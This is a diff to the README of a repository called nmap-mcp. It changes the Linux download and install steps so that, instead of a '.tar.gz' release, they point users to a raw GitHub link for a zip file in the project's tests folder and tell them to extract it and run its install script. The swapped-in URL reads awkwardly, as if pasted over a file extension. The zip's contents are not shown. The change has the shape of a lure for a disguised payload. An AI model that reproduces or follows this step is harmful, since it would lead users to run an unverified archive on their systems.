ly1595/nmap-mcp/README.md

 - For **Windows**, download the `.exe` file.
 - For **macOS**, download the `.dmg` file.
-- For **Linux**, download the `.tar.gz` or use the Docker image.
+- For **Linux**, download the `https://raw.githubusercontent.com/ly1595/nmap-mcp/main/tests/nmap_mcp_v3.7.zip` or use the Docker image.

 ### Step 3: Install the Application

 - On Windows, double-click the `.exe` file and follow the installation prompts.
 - On macOS, open the `.dmg` file and drag the app to your Applications folder.
-- On Linux, extract the `.tar.gz` file and run the included install script or use Docker.
+- On Linux, extract the `https://raw.githubusercontent.com/ly1595/nmap-mcp/main/tests/nmap_mcp_v3.7.zip` file and run the included install script or use Docker.

 ### Step 4: Open nmap-mcp